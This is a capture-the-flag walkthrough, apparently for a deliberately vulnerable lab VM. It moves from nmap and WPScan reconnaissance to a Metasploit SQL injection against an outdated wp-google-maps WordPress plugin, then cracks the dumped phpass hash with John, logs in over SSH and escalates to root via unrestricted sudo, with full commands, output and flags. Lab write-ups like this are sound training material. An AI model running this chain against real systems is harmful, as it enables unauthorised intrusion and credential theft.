We find the IP of the vulnerable machine to be 192.168.10.13
2. Scanning
2.1 Nmap
Using nmap to find the open ports and their services
nmap -p- -sV 192.168.10.13
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 21:20 IST
Nmap scan report for 192.168.10.13
Host is up (0.42s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
10000/tcp open ssl/http MiniServ 1.890 (Webmin httpd)
MAC Address: 08:00:27:28:F0:0B (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We find 4 open ports, tcp ports 21, 22, 80 and 10000 with ftp, ssh and two web servers running respectively
Using Wappalyzer on the webpage running on port 80 we see that it uses WordPress CMS.
3. Initial Foothold
3.1 WPScan
Using WPScan to find any vulnerable plugins
wpscan --url http://192.168.10.13
_______________________________________________________________
[i] Plugin(s) Identified:
[+] wp-google-maps
| Location: http://192.168.10.13/wp-content/plugins/wp-google-maps/
| Last Updated: 2022-03-03T08:07:00.000Z
| [!] The version is out of date, the latest version is 8.1.21
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.10.02 (50% confidence)
| Found By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.10.13/wp-content/plugins/wp-google-maps/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===============================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Mar 17 21:29:28 2022
[+] Requests Done: 173
[+] Cached Requests: 5
[+] Data Sent: 42.98 KB
[+] Data Received: 414.952 KB
[+] Memory used: 224.848 MB
[+] Elapsed time: 00:00:06
We find that a wp-google-maps plugin is installed and might be vulnerable
3.2 Metasploit
We find a module in metasploit for the plugging: auxiliary/admin/http/wp_google_maps_sqli
Using the auxiliary module and setting RHOST to 192.168.10.13
[msf](Jobs:0 Agents:0) auxiliary(admin/http/wp_google_maps_sqli) >> show options
Module options (auxiliary/admin/http/wp_google_maps_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
DB_PREFIX wp_ yes WordPress table prefix
Proxies no A proxy chain of format type:host:port[,type:host:p
ort][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/m
etasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
[msf](Jobs:0 Agents:0) auxiliary(admin/http/wp_google_maps_sqli) >> set RHOSTS 192.168.10.13
RHOSTS => 192.168.10.13
[msf](Jobs:0 Agents:0) auxiliary(admin/http/wp_google_maps_sqli) >> run
[*] Running module against 192.168.10.13
[*] 192.168.10.13:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20220317213725_default_192.168.10.13_wp_google_maps.j_909026.bin
[+] 192.168.10.13:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*] Auxiliary module execution completed
We get a username and a password hash: webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1
3.3 Cracking the hash
To crack the hash, we save the hash into a file called passwd.txt
We are using JohnTheRipper to crack to hash
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
kittykat1 (?)
1g 0:00:00:01 DONE (2022-03-17 21:52) 0.5076g/s 5080p/s 5080c/s 5080C/s sandara..ilovewill
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
We get the password kittykat1
Using ssh we can login to the machine as webmaster
webmaster@HF2019-Linux:~$ ls
flag.txt
webmaster@HF2019-Linux:~$ cat flag.txt
83cad236438ff0c0dbce55d7f0034aee18f5c39
4. Privilege Escalation
Using sudo -l we find that webmaster can run ALL commands as root
webmaster@HF2019-Linux:~$ sudo -l
Matching Defaults entries for webmaster on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User webmaster may run the following commands on localhost:
(ALL) ALL
webmaster@HF2019-Linux:~$ sudo su
root@HF2019-Linux:/home/webmaster whoami
root
flag.txt
root@HF2019-Linux:/ cd /root
root@HF2019-Linux:~ ls
flag.txt
root@HF2019-Linux:~ cat flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624
